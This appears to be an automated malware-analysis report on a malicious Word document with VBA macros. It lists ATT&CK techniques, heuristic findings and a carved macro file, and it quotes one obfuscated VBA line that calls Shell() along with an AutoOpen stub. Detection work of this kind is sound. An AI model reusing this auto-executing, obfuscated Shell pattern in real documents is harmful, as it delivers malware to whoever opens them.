Verdict: MALICIOUS (Risk Score: 150)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro and RLOSTYCk function both call the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The specific command executed by Shell() is obfuscated through string concatenation and function calls, but the presence of the Shell() function itself is a critical indicator.
Heuristics (6)
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `iaKKd = Tan(16413) RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079) BGXTp = Tan(17162)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `End Function Sub Autoopen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11683 bytes |

SHA-256 of macros.bas: cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630
Preview script: first 1,000 lines of the extracted script.